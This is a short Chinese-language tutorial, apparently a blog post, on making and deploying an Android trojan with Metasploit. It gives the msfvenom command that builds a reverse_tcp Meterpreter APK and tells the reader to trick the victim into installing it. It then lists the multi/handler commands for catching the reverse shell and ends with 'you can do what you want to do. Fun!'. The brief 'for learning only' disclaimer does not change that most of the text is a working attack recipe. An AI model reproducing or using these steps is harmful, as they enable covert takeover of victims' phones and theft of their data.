metasploit---安卓木馬入侵
(僅供學習使用,禁止非法使用)
1.生成木馬程序
msfvenom -p android/meterpreter/reverse_tcp LHOST=本機ip LPORT=本機端口 R > 保存路徑/文件名.apk
這里我們使用了反射型tcp,讓目標主機連接我們,有時攻擊服務器時這種方法可以很好的繞過防火牆。
2.想方設法欺騙對方安裝木馬app
3.打開msfconsole開始攻擊
//選擇模塊
use exploit/multi/handler
//顯示攻擊載荷
show payloads
//設置攻擊載荷
set payload android/meterpreter/reverse_tcp
//顯示需要配置的選項
show options
//設置本機ip
set lhost 本機ip
//設置本機監聽端口
set lport 本機端口
4.攻擊成功,則會得到一個meterpreter會話
輸入help查看幫助。
Then
you can do what you want to do.
Fun!